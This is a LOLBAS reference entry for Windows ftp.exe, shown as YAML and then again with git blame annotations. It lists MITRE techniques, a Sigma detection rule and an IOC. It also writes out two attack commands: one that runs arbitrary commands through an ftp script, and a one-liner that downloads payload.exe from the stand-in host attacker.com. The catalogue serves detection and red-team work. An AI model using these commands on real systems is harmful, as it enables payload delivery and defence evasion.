LOLBAS/yml/OSBinaries/Ftp.yml

---
Name: Ftp.exe
Description: A binary designed for connecting to FTP servers
Author: 'Oddvar Moe'
Created: 2018-12-10
Commands:
  - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
    Description: Executes the commands you put inside the text file.
    Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
    Description: Download
    Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\ftp.exe
  - Path: C:\Windows\SysWOW64\ftp.exe
Code_Sample:
  - Code:
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml
  - IOC: cmd /c as child process of ftp.exe
Resources:
  - Link: https://twitter.com/0xAmit/status/1070063130636640256
  - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939
  - Link: https://ss64.com/nt/ftp.html
  - Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
  - Person: BennyHusted
    Handle: ''
  - Person: Amit Serper
    Handle: '@0xAmit'
Added ftp.exe 2018-12-10 15:03:30 +01:00			`---`
			`Name: Ftp.exe`
			`Description: A binary designed for connecting to FTP servers`
			`Author: 'Oddvar Moe'`
Standardise date formats (see https://yaml.org/type/timestamp.html) 2021-01-10 16:04:52 +01:00			`Created: 2018-12-10`
Added ftp.exe 2018-12-10 15:03:30 +01:00			`Commands:`
			`- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt`
			`Description: Executes the commands you put inside the text file.`
			`Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand`
			`Category: Execute`
			`Privileges: User`
More changes (mainly changing some T1218 instances to T1202) 2021-11-05 21:17:04 +01:00			`MitreID: T1202`
Updating entries that have been confirmed to be working on Windows 11 (21H2) 2021-12-14 16:50:17 +01:00			`OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11`
Download for ftp.exe add a non-interactive one-line command to download arbitrary binary with ftp.exe excessively useful on Windows XP, & Windows Server 2003 where all other LOLBAS that allow download (certutils, bitsutils, etc.) don't exist and where powershell was not install by default. 2020-04-21 23:52:22 +02:00			`- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"`
			`Description: Download`
			`Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.`
			`Category: Download`
			`Privileges: User`
			`MitreID: T1105`
Updating entries that have been confirmed to be working on Windows 11 (21H2) 2021-12-14 16:50:17 +01:00			`OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11`
Added ftp.exe 2018-12-10 15:03:30 +01:00			`Full_Path:`
			`- Path: C:\Windows\System32\ftp.exe`
			`- Path: C:\Windows\SysWOW64\ftp.exe`
Standardise date formats (see https://yaml.org/type/timestamp.html) 2021-01-10 16:04:52 +01:00			`Code_Sample:`
Fixing errors found in yaml lint action. 2022-09-11 07:07:18 +02:00			`- Code:`
Added ftp.exe 2018-12-10 15:03:30 +01:00			`Detection:`
$frack113$ Update old sigma link (#303) * Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> --------- Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> 2023-10-18 17:30:34 +02:00			`- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml`
Fixing errors found in yaml lint action. 2022-09-11 07:07:18 +02:00			`- IOC: cmd /c as child process of ftp.exe`
Added ftp.exe 2018-12-10 15:03:30 +01:00			`Resources:`
			`- Link: https://twitter.com/0xAmit/status/1070063130636640256`
			`- Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939`
			`- Link: https://ss64.com/nt/ftp.html`
Download for ftp.exe add a non-interactive one-line command to download arbitrary binary with ftp.exe excessively useful on Windows XP, & Windows Server 2003 where all other LOLBAS that allow download (certutils, bitsutils, etc.) don't exist and where powershell was not install by default. 2020-04-21 23:52:22 +02:00			`- Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/`
Added ftp.exe 2018-12-10 15:03:30 +01:00			`Acknowledgement:`
			`- Person: Casey Smith`
			`Handle: '@subtee'`
			`- Person: BennyHusted`
			`Handle: ''`
			`- Person: Amit Serper`
Tweaked the Link regex to allow anchor tags and the handle regex to permit blank entries. 2022-09-14 05:37:10 +02:00			`Handle: '@0xAmit'`